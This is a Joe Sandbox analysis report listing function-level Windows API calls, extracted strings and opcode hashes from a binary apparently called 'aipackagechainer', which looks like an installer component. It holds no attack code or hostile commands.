                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastObjectSingleWait$CloseCreateDeleteEventHandleHeapProcessReset
                                          • String ID: .part$123$DLD$POST$p1Wu
                                          • API String ID: 3354080062-1236063139
                                          • Opcode ID: 5a892f075e67f208317bf4ddaf5e84c8c911176c34dec34020ecfdc2613b8b5e
                                          • Instruction ID: 58d230814f17ac7b5f3d2f50a01a9230c1c57321b29a833338fbb5199fae005e
                                          • Opcode Fuzzy Hash: 5a892f075e67f208317bf4ddaf5e84c8c911176c34dec34020ecfdc2613b8b5e
                                          • Instruction Fuzzy Hash: 2FF1BB70A0024AEFDB10DFA8C944BEEBBF5FF4A314F144229F915A7291DB749A44CB91
                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 000C635B
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C636B
                                          • GetLastError.KERNEL32 ref: 000C6378
                                          • ResetEvent.KERNEL32(?), ref: 000C6394
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C63A4
                                          • GetLastError.KERNEL32 ref: 000C63B1
                                          • GetLastError.KERNEL32 ref: 000C63EF
                                          • SetEvent.KERNEL32(?), ref: 000C6431
                                          • GetLastError.KERNEL32 ref: 000C6437
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 000C649F
                                          • GetLastError.KERNEL32 ref: 000C64AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorEventLast$CreateReset$ObjectSingleWait
                                          • String ID:
                                          • API String ID: 3708806560-0
                                          • Opcode ID: 14c44bdd74d85900173db5c6dbb20d12097697ff40194a0def38d55abe8a3198
                                          • Instruction ID: 600be0ebcb2ab8f1589174a434cfd5742890129df55254494dfe34b40f99196e
                                          • Opcode Fuzzy Hash: 14c44bdd74d85900173db5c6dbb20d12097697ff40194a0def38d55abe8a3198
                                          • Instruction Fuzzy Hash: B191DF327002128BEB78CF69D884F6E77E5EF84311F11416DE946DB2A6DB22EC41CB94
                                          APIs
                                          • InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          • EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
                                          • WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F
                                          • WriteFile.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 000886C5
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 000886CE
                                          • WriteFile.KERNEL32(00000000,?,00000000,000F2DAD,00000000,0010C440,00000002,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 0008872F
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 00088738
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 00088768
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                          • String ID:
                                          • API String ID: 201293332-0
                                          • Opcode ID: 97c31f379570a68ea23dc2cda083bead4464fc33361aa6e6343402c29a9a1d22
                                          • Instruction ID: e40164a6803b84cc23a286ed853e6e650f1113aac72c0f7d3d7aa1ef8f943c0c
                                          • Opcode Fuzzy Hash: 97c31f379570a68ea23dc2cda083bead4464fc33361aa6e6343402c29a9a1d22
                                          • Instruction Fuzzy Hash: B861CE31900684EFEB00DF68CD49BA9BBB4FF05310F548159F941A76A2DB74AD14DFA1
                                          APIs
                                          • GetLastError.KERNEL32 ref: 000AB0A4
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,.part,00000005,?,?,?), ref: 000AB1A6
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 000AB202
                                          • CloseHandle.KERNEL32(00000000), ref: 000AB226
                                          • ResetEvent.KERNEL32(?,00000000,00111604,00000000,00000000,00000000,00000000,00000000,?), ref: 000AB4D8
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AB507
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AB511
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileObjectSingleWait$CloseCreateErrorEventHandleLastResetSize
                                          • String ID: .part$<
                                          • API String ID: 1885162932-3789028153
                                          • Opcode ID: 0f9c027e2898d2baceba4d6fd47b70f7d5d9fff540f819841926efb1491ccc1f
                                          • Instruction ID: effbd08c2aa925112f4f1e5d45897fc32e94a1ecaa621b753c1eb2c59f0aeeda
                                          • Opcode Fuzzy Hash: 0f9c027e2898d2baceba4d6fd47b70f7d5d9fff540f819841926efb1491ccc1f
                                          • Instruction Fuzzy Hash: 25128E30D01659EFEB24CFA4CC44B9DBBF5BF46314F148299E508A7292DB74AA84CF91
                                          APIs
                                          • _wcsrchr.LIBVCRUNTIME ref: 000842F9
                                          • _wcsrchr.LIBVCRUNTIME ref: 000843B8
                                          • GetFileAttributesW.KERNEL32(?,?), ref: 00084521
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0008452E
                                            • Part of subcall function 00084940: RemoveDirectoryW.KERNEL32(D11C52E5,00000000,?,\\?\,00000004,?,000852B3,?,D11C52E5), ref: 00084767
                                            • Part of subcall function 00084940: GetLastError.KERNEL32(?,000852B3,?,D11C52E5), ref: 000847A6
                                          • FindNextFileW.KERNEL32(?,?), ref: 00084588
                                          • FindClose.KERNEL32(00000000), ref: 00084605
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$AttributesFind_wcsrchr$CloseDirectoryErrorLastNextRemove
                                          • String ID: p2Wu3Wu
                                          • API String ID: 2849099095-2643637717
                                          • Opcode ID: c94de2558dbe56d2e10044745bc811b36ab6ef1dccd14892d9930570674c4e7c
                                          • Instruction ID: fb7b86ae4d2250ddafe376a0fb3733d2adec572e959ccb8bb3c7bfbd8494bff9
                                          • Opcode Fuzzy Hash: c94de2558dbe56d2e10044745bc811b36ab6ef1dccd14892d9930570674c4e7c
                                          • Instruction Fuzzy Hash: AEB1CD70A0064AAFDB24EF68CC49BEEB7E4FF45321F144229E955972D2EB749E04CB50
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B18
                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B22
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B31
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00078B4E
                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B58
                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B65
                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B6F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
                                          • String ID: "%s" %s$D
                                          • API String ID: 3234789809-3971972636
                                          • Opcode ID: f7bc6cf643929a6a94cff1df58ddaaa7feab3c06328341f5164a42517b68b28b
                                          • Instruction ID: 4915d5aa17f2f1d1a781ef87a2783f96b54f8fa0df9709ea1511f2fb5f2ff98c
                                          • Opcode Fuzzy Hash: f7bc6cf643929a6a94cff1df58ddaaa7feab3c06328341f5164a42517b68b28b
                                          • Instruction Fuzzy Hash: C9519771D40605EFDB20CF64CC09BAEB7B5FF84720F14C61AE515A7290DB74A941CBA9
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 0008E8E1
                                          • DeleteObject.GDI32(?), ref: 0008E939
                                            • Part of subcall function 0008E2E0: IsWindowVisible.USER32 ref: 0008E2F6
                                            • Part of subcall function 0008E2E0: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0008E312
                                            • Part of subcall function 0008E2E0: GetWindowLongW.USER32(?,000000F0), ref: 0008E318
                                            • Part of subcall function 0008E2E0: GetDlgItem.USER32(?,?), ref: 0008E38A
                                            • Part of subcall function 0008E2E0: GetWindowRect.USER32(00000000,?), ref: 0008E3A2
                                            • Part of subcall function 0008E2E0: MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0008E3B3
                                          • EndDialog.USER32(?,00000000), ref: 0008E9B9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$DeleteDialogItemMessageObjectPointsRectSendVisible
                                          • String ID:
                                          • API String ID: 2368538989-0
                                          • Opcode ID: fd6fc9a77638ecd359d3c3252ecc60982c26160bd7ee164c35ced9a515a9e3eb
                                          • Instruction ID: d3f7323f88a77aa62844f13ce5c8e1e0b27c3c0accbd48e60c269c0be349ed99
                                          • Opcode Fuzzy Hash: fd6fc9a77638ecd359d3c3252ecc60982c26160bd7ee164c35ced9a515a9e3eb
                                          • Instruction Fuzzy Hash: 0241E63220025567D628AE3CEC4DB7A7798F789731F044B2AFD91C36E0C6A5A911D791
                                          APIs
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A0731
                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000002,00000010,?,?,00000010,00000000,?,0008FC64), ref: 000A07A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Open_wcsrchr
                                          • String ID: Windows 10 version 20H2 x64$Windows 10 version 20H2 x86$Windows 10 version 21H1 x64$Windows 10 version 21H1 x86$Windows 10 version 22H2 x64$Windows 10 version 22H2 x86
                                          • API String ID: 1765551594-1750758643
                                          • Opcode ID: 217ae49629032f2e6879b8470d7a0fa60b7154c3d4d7a8c25f06bbf4f9a24db0
                                          • Instruction ID: 93ebe18a4ca0978896337ab04dfe4cbe5a4176232723a21a0cb4484a0d1c13d8
                                          • Opcode Fuzzy Hash: 217ae49629032f2e6879b8470d7a0fa60b7154c3d4d7a8c25f06bbf4f9a24db0
                                          • Instruction Fuzzy Hash: 6951A071E006099FDB10CBA8CC45BAEBBB9FF45324F108369E925A72D1DB74AD058BD0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000CC44D
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000CC45B
                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000CC46C
                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000CC47D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                          • API String ID: 667068680-1247241052
                                          • Opcode ID: a64487fda1d6dd5c205cb7bb99e6a246e5ae53b110055ff64b23db3649228463
                                          • Instruction ID: e7b8b0ca864e46ff525dae478a0f3538dbe047cefa1c41b63de51f01abd428c2
                                          • Opcode Fuzzy Hash: a64487fda1d6dd5c205cb7bb99e6a246e5ae53b110055ff64b23db3649228463
                                          • Instruction Fuzzy Hash: 00E0B632A56254BBE710AF74EC49CA63AA4AB056113004122F505D2A60EFF845D5EBB5
                                          APIs
                                          • GetDlgItem.USER32(?,00000427), ref: 000AF726
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000AF736
                                          • EndDialog.USER32(00000000,00000001), ref: 000AF74A
                                            • Part of subcall function 000AFA30: SetWindowTextW.USER32(00000000,000FA9B5), ref: 000AFABF
                                            • Part of subcall function 000AFA30: GetDlgItem.USER32(00000000,0000042B), ref: 000AFB17
                                            • Part of subcall function 000AFA30: SetWindowTextW.USER32(00000000,00000000), ref: 000AFB1E
                                            • Part of subcall function 000AFA30: GetDlgItem.USER32(?,00000001), ref: 000AFB2B
                                            • Part of subcall function 000AFA30: EnableWindow.USER32(00000000,00000000), ref: 000AFB30
                                          • EndDialog.USER32(00000000,00000002), ref: 000AF775
                                          • GetDlgItem.USER32(00000000,00000001), ref: 000AF7C4
                                          • EnableWindow.USER32(00000000,00000000), ref: 000AF7D6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ItemWindow$DialogEnableText$MessageSend
                                          • String ID:
                                          • API String ID: 3408327222-0
                                          • Opcode ID: 11168c574a527bec9e366d2ff3b21fa27f6026d7d85d983d642a7ce8ef09f5ab
                                          • Instruction ID: 00f7158df741d2447dddb80fd89e2cf1f8f5fa03a13c788bb7cb18dccbc43531
                                          • Opcode Fuzzy Hash: 11168c574a527bec9e366d2ff3b21fa27f6026d7d85d983d642a7ce8ef09f5ab
                                          • Instruction Fuzzy Hash: 31513671B002069FEB249FA8DC89BBA77A5FB55320F40413AF901876A0CB75DD91CBE1
                                          APIs
                                          • IsWindowVisible.USER32 ref: 0008E2F6
                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0008E312
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0008E318
                                          • GetDlgItem.USER32(?,?), ref: 0008E38A
                                          • GetWindowRect.USER32(00000000,?), ref: 0008E3A2
                                          • MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0008E3B3
                                          • SetWindowPos.USER32(00000014,00000000,?,00000002,00000002,?,00000014,?,00000002,00000002,?,?,?,000000F0,?,00000000), ref: 0008E42F
                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0008E463
                                          • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0008E470
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$ItemLongPointsRectRedrawVisible
                                          • String ID:
                                          • API String ID: 3196996609-0
                                          • Opcode ID: a613d5fb01fb0fe79581350e5d898a032e59ea41ac0ed92c47f44d9e1c6aa65f
                                          • Instruction ID: 6c2dfc7869f767761990e88ddb137cf5e38306813f6b01c5fbf628b22112bae5
                                          • Opcode Fuzzy Hash: a613d5fb01fb0fe79581350e5d898a032e59ea41ac0ed92c47f44d9e1c6aa65f
                                          • Instruction Fuzzy Hash: CE5137302043419FE724DF29C889B2ABBE1BF88704F184A1DF9899B2A5D731ED54CB56
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 000D06A8
                                          • ___TypeMatch.LIBVCRUNTIME ref: 000D07B6
                                          • _UnwindNestedFrames.LIBCMT ref: 000D0908
                                          • CallUnexpected.LIBVCRUNTIME ref: 000D0923
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: 67a5479f9b2d9ac328e998d6a96e1d274009c7627e5912773d0a70606851431b
                                          • Instruction ID: 2f7075ee330b858ac3becd63bab22682f1bbb736a3e6935856644bdfdf3ac6ea
                                          • Opcode Fuzzy Hash: 67a5479f9b2d9ac328e998d6a96e1d274009c7627e5912773d0a70606851431b
                                          • Instruction Fuzzy Hash: 96B14771800309EFCF18DFA4D881AAEBBB5BF54310F14416AE8586B316D771EA61DFA1
                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00085D78
                                          • GetLastError.KERNEL32 ref: 00085D89
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00085D9F
                                          • GetExitCodeProcess.KERNEL32(00000000,?), ref: 00085DB0
                                          • CloseHandle.KERNEL32(00000000), ref: 00085DBE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CloseCodeErrorExecuteExitHandleLastObjectProcessShellSingleWait
                                          • String ID: \\?\$open
                                          • API String ID: 1481985272-3841230862
                                          • Opcode ID: 3c04a01b91aa2f64aaf92fcd0d41d10fd6e023bb0c6a13accef97cfb901419ef
                                          • Instruction ID: af2497ab8e74ee7f9c53a06e27dcebc0db0b829d85b852a3f9bfd9fe5dbb7301
                                          • Opcode Fuzzy Hash: 3c04a01b91aa2f64aaf92fcd0d41d10fd6e023bb0c6a13accef97cfb901419ef
                                          • Instruction Fuzzy Hash: 14918B71A00A09CBDB20DFA8CC48BAEB7F5FF59325F148269E855AB291D7759D00CB90
                                          APIs
                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,D11C52E5,Function_00069AFA,00000000,?,Function_0008C250,000000FF,?,0007FACB,?), ref: 0007FBB9
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 0007FBC9
                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,D11C52E5,Function_00069AFA,00000000,?,Function_0008C250,000000FF,?,0007FACB,?), ref: 0007FC29
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0007FC39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                          • API String ID: 1646373207-1053001802
                                          • Opcode ID: ceba81071d965340ad6aef870e35ac359f0eeb94db10082da654fed20caa56dd
                                          • Instruction ID: d78688fa7b9f2936873d981f6f9c85231f5baf097f158af28a79bb1529e88997
                                          • Opcode Fuzzy Hash: ceba81071d965340ad6aef870e35ac359f0eeb94db10082da654fed20caa56dd
                                          • Instruction Fuzzy Hash: B831D872A08249FFEB218F59ED40FA9BBE4E748720F10813AED05D3690DB7A5490DB94
                                          APIs
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00129AFC), ref: 0008D5D0
                                          • LoadLibraryW.KERNEL32(Shell32.dll,?,?,00129AFC), ref: 0008D5E3
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0008D5F3
                                          • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0008D67C
                                          • SHGetMalloc.SHELL32(?), ref: 0008D6BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                          • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                          • API String ID: 2352187698-2988203397
                                          • Opcode ID: fd58378efd438460de199303f45311427a96f3c3d91e36723ba835eec3b48914
                                          • Instruction ID: e36b8eecf2e1f8aa054c7f0c5d58709555775ad7d2674bd305359c23d917f7ca
                                          • Opcode Fuzzy Hash: fd58378efd438460de199303f45311427a96f3c3d91e36723ba835eec3b48914
                                          • Instruction Fuzzy Hash: A231E431600301ABEB24AF28DC45B6B77F5BFD4720F54846EE489871D0FBB59895CB91
                                          APIs
                                            • Part of subcall function 0008CD60: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D11C52E5,00000000,00000000,?), ref: 0008CDBB
